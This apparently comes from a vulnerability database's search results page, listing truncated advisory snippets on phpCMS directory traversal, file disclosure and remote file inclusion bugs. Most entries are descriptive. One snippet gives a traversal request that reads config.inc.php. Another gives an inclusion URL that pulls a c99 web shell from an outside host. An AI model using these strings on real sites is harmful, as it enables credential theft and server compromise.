371 matches found
CVE-2008-0513
Directory traversal vulnerability in parser/include/class.cachephpcms.php in phpCMS 1.2.2 allows remote attackers to read arbitrary files via a .. dot dot in the file parameter to parser/parser.php, as demonstrated by a filename ending with %00.gif, a different vector than CVE-2005-1840...
phpCMS 1.2.2 (parser.php file) Remote File Disclosure Vulnerability
No description provided by source. Digital Security Research Group DSecRG Advisory DSECRG-08-005 Application: phpCMS Versions Affected: 1.2.2 Vendor URL: http://www.phpcms.de Bug: Remote File Disclosure, Get admin password Exploits: YES Reported: 10.01.2008 Vendor response: 12.01.2008 Date of...
phpCMS 1.2.2 - 'file' Remote File Disclosure
Digital Security Research Group DSecRG Advisory DSECRG-08-005 Application: phpCMS Versions Affected: 1.2.2 Vendor URL: http://www.phpcms.de Bug: Remote File Disclosure, Get admin password Exploits: YES Reported: 10.01.2008 Vendor response: 12.01.2008 Date of Public Advisory: 29.01.2008 Authors:...
Remote File Disclosure in phpCMS 1.2.2
Digital Security Research Group DSecRG Advisory DSECRG-08-005 Application: phpCMS Versions Affected: 1.2.2 Vendor URL: http://www.phpcms.de Bug: Remote File Disclosure, Get admin password Exploits: YES Reported: 10.01.2008 Vendor response: 12.01.2008 Date of Public Advisory: 29.01.2008 Authors:...
phpCMS 1.2.2 (parser.php file) Remote File Disclosure Vulnerability
Exploit for unknown platform in category web applications =================================================================== phpCMS 1.2.2 parser.php file Remote File Disclosure Vulnerability =================================================================== Digital Security Research Group DSecR...
phpCMS 1.2.2 - file Remote File Disclosure
phpCMS 1.2.2 - file Remote File Disclosure Digital Security Research Group DSecRG Advisory DSECRG-08-005 Application: phpCMS Versions Affected: 1.2.2 Vendor URL: http://www.phpcms.de Bug: Remote File Disclosure, Get admin password Exploits: YES Reported: 10.01.2008 Vendor response: 12.01.2008 Dat...
PHPCMS 2007 show_pic.inc.php本地包含漏洞
PHPCMS 网站管理系统是一个基于PHP+MYSQL的全站生成html的建站系统,经过完善设计并适用于各种服务器环境如UNIX、LINUX、WINDOWS等的高效、全新、快速、优秀的网站解决方案 showpic.inc.php 是否配置了src变量,如果有的话就把路径值赋给file。 这里src的类型没有判断。跳到根目录提交配置文件就可以读取数据库的连接密码了。 PHPCMS2007 官方暂时没有解决方案 http://www.phpcms.cn/ POST /picture/showpic.php?src=/../../../config.inc.php...
phpcms117-rfi.txt
phpcms LANGUAGE ; if $DEFAULTS-STATS == 'on' -------------------------------------------- Exmple And Methode Exploit : http://www.traget./cms/include/class.cachephpcms.php?PHPCMSINCLUDEPATH=http://b0rizq.by.ru/c99.txt? """"""""""www.b0rizQ.Biz"""""""""""""""""""""...
phpCMS 1.1.7 - class.layout_PHPcms.php Remote File Inclusion
phpCMS 1.1.7 - class.layoutPHPcms.php Remote File Inclusion source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromis...
phpCMS 1.1.7 - class.session_PHPcms.php Remote File Inclusion
phpCMS 1.1.7 - class.sessionPHPcms.php Remote File Inclusion source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromi...
phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks a...
phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks a...
phpCMS 1.1.7 - class.parser_PHPcms.php Remote File Inclusion
phpCMS 1.1.7 - class.parserPHPcms.php Remote File Inclusion source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromis...
phpCMS 1.1.7 - class.edit_PHPcms.php Remote File Inclusion
phpCMS 1.1.7 - class.editPHPcms.php Remote File Inclusion source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise...
phpCMS 1.1.7 - class.lib_indexer_universal_PHPcms.php Remote File Inclusion
phpCMS 1.1.7 - class.libindexeruniversalPHPcms.php Remote File Inclusion source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker...
phpcms <=- 1.1.7 Remote File Inclusion
phpcms =- 1.1.7 Remote File Inclusion Download Source : http://phpcms.de/files/phpcms117.zip Found By : b0rizQ Greetz : Nuck3r + CrackMan + RedCasper + RaChidox + Broken-Proxy + S4mi File : class.cachephpcms.php --Bugs-------------------------------------- include...
phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks a...
phpCMS 1.1.7 - 'counter.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks a...
phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks a...
phpCMS 1.1.7 - class.search_PHPcms.php Remote File Inclusion
phpCMS 1.1.7 - class.searchPHPcms.php Remote File Inclusion source: https://www.securityfocus.com/bid/21768/info phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromis...